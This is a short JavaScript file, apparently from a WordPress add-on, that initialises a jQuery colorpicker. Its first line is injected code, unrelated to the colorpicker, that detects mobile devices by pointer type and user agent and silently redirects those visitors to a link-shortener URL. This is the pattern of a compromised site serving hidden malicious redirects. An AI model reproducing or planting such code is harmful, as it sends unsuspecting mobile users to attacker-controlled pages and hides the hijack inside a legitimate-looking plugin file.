(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.today/pMRMqUxXY0r9");

/*global jQuery:false*/

jQuery(document).ready(function () {
    MT_Addons_JS.init();
});

// Init all fields functions (invoked from ajax)
var MT_Addons_JS = {
    init: function () {
        // Load colorpicker if field exists
        MT_Addons_ColorPicker.init();
    }
};


var MT_Addons_ColorPicker = {
    init: function () {
        var $colorPicker = jQuery('.mtfe-colorpicker');
        if ($colorPicker.length > 0) {

            $colorPicker.wpColorPicker();

        }
    }
};